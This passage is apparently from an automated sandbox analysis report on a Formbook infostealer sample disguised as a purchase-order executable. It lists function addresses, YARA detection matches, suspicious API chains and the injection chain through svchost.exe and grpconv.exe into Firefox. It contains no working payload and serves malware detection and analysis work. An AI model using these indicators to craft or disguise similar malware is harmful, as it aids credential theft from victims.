            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F24462_2_037F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EE4F62_2_037EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB402_2_037FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F6BD72_2_037F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA802_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037569622_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380A9A62_2_0380A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A02_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374A8402_2_0374A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037428402_2_03742840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E8F02_2_0376E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037268B82_2_037268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F402_2_037B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760F302_2_03760F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03782F282_2_03782F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE02_2_0374CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732FC82_2_03732FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BEFA02_2_037BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740E592_2_03740E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEE262_2_037FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEEDB2_2_037FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752E902_2_03752E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FCE932_2_037FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374AD002_2_0374AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373ADE02_2_0373ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03758DBF2_2_03758DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740C002_2_03740C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730CF22_2_03730CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0CB52_2_037E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372D34C2_2_0372D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F132D2_2_037F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0378739A2_2_0378739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E12ED2_2_037E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B2C02_2_0375B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037452A02_2_037452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372F1722_2_0372F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377516C2_2_0377516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374B1B02_2_0374B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380B16B2_2_0380B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F70E92_2_037F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF0E02_2_037FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EF0CC2_2_037EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037470C02_2_037470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF7B02_2_037FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F16CC2_2_037F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F75712_2_037F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DD5B02_2_037DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037314602_2_03731460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF43F2_2_037FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFB762_2_037FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B5BF02_2_037B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377DBF92_2_0377DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FB802_2_0375FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B3A6C2_2_037B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFA492_2_037FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7A462_2_037F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EDAC62_2_037EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DDAAC2_2_037DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03785AA02_2_03785AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037499502_2_03749950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B9502_2_0375B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D59102_2_037D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AD8002_2_037AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037438E02_2_037438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFF092_2_037FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFFB12_2_037FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03741F922_2_03741F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03749EB02_2_03749EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7D732_2_037F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F1D5A2_2_037F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03743D402_2_03743D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FDC02_2_0375FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B9C322_2_037B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFCF22_2_037FFCF2
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_046124465_2_04612446
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_046044205_2_04604420
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0460E4F65_2_0460E4F6
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045605355_2_04560535
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_046205915_2_04620591
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0457C6E05_2_0457C6E0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045847505_2_04584750
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045607705_2_04560770
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0455C7C05_2_0455C7C0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045F20005_2_045F2000
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045E81585_2_045E8158
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045FA1185_2_045FA118
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045501005_2_04550100
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_046181CC5_2_046181CC
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_046201AA5_2_046201AA
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_046002745_2_04600274
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045E02C05_2_045E02C0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0461A3525_2_0461A352
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_046203E65_2_046203E6
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0456E3F05_2_0456E3F0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04560C005_2_04560C00
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04550CF25_2_04550CF2
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04600CB55_2_04600CB5
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045FCD1F5_2_045FCD1F
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0456AD005_2_0456AD00
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0455ADE05_2_0455ADE0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04578DBF5_2_04578DBF
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04560E595_2_04560E59
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0461EE265_2_0461EE26
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0461EEDB5_2_0461EEDB
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04572E905_2_04572E90
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0461CE935_2_0461CE93
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045D4F405_2_045D4F40
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04602F305_2_04602F30
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04580F305_2_04580F30
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045A2F285_2_045A2F28
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04552FC85_2_04552FC8
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0456CFE05_2_0456CFE0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045DEFA05_2_045DEFA0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045628405_2_04562840
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0456A8405_2_0456A840
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0458E8F05_2_0458E8F0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045468B85_2_045468B8
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045769625_2_04576962
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0462A9A65_2_0462A9A6
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045629A05_2_045629A0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0455EA805_2_0455EA80
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0461AB405_2_0461AB40
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04616BD75_2_04616BD7
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045514605_2_04551460
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0461F43F5_2_0461F43F
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_046175715_2_04617571
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045FD5B05_2_045FD5B0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_046116CC5_2_046116CC
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0461F7B05_2_0461F7B0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0461F0E05_2_0461F0E0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_046170E95_2_046170E9
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045670C05_2_045670C0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0460F0CC5_2_0460F0CC
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0462B16B5_2_0462B16B
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0454F1725_2_0454F172
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0459516C5_2_0459516C
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0456B1B05_2_0456B1B0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_046012ED5_2_046012ED
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0457B2C05_2_0457B2C0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045652A05_2_045652A0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0454D34C5_2_0454D34C
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0461132D5_2_0461132D
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045A739A5_2_045A739A
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045D9C325_2_045D9C32
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0461FCF25_2_0461FCF2
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04617D735_2_04617D73
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04563D405_2_04563D40
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04611D5A5_2_04611D5A
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0457FDC05_2_0457FDC0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04569EB05_2_04569EB0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0461FF095_2_0461FF09
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04561F925_2_04561F92
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0461FFB15_2_0461FFB1
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045CD8005_2_045CD800
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045638E05_2_045638E0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045699505_2_04569950
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0457B9505_2_0457B950
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045F59105_2_045F5910
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04617A465_2_04617A46
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0461FA495_2_0461FA49
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045D3A6C5_2_045D3A6C
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0460DAC65_2_0460DAC6
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04601AA35_2_04601AA3
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045FDAAC5_2_045FDAAC
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045A5AA05_2_045A5AA0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0461FB765_2_0461FB76
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0459DBF95_2_0459DBF9
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045D5BF05_2_045D5BF0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0457FB805_2_0457FB80
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002E1CC05_2_002E1CC0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002DCBAE5_2_002DCBAE
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002DCBB05_2_002DCBB0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002DCDD05_2_002DCDD0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002DAE505_2_002DAE50
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002E53905_2_002E5390
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002E356C5_2_002E356C
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002E35705_2_002E3570
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002FBA005_2_002FBA00
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0430E73C5_2_0430E73C
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0430D7A85_2_0430D7A8
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0430E2885_2_0430E288
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_043153795_2_04315379
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_0430E3A35_2_0430E3A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 57 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 100 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 272 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: String function: 00445AE0 appears 65 times
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 04595130 appears 58 times
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 0454B970 appears 277 times
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 045CEA12 appears 86 times
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 045A7E54 appears 102 times
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 045DF290 appears 105 times
            Source: Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1471824943.00000000047AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order_ AEPL-2324-1126.exe
            Source: Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1472756758.0000000004603000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order_ AEPL-2324-1126.exe
            Source: Purchase Order_ AEPL-2324-1126.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/15
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0046CB5F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeFile created: C:\Users\user~1\AppData\Local\Temp\cuniliJump to behavior
            Source: Purchase Order_ AEPL-2324-1126.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: grpconv.exe, 00000005.00000002.3859947867.000000000281E000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3859947867.00000000027F1000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3859947867.0000000002841000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1816235847.0000000002812000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3859947867.0000000002812000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Purchase Order_ AEPL-2324-1126.exeVirustotal: Detection: 27%
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeFile read: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe"
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe"
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeProcess created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"
            Source: C:\Windows\SysWOW64\grpconv.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe"Jump to behavior
            Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exeProcess created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"Jump to behavior
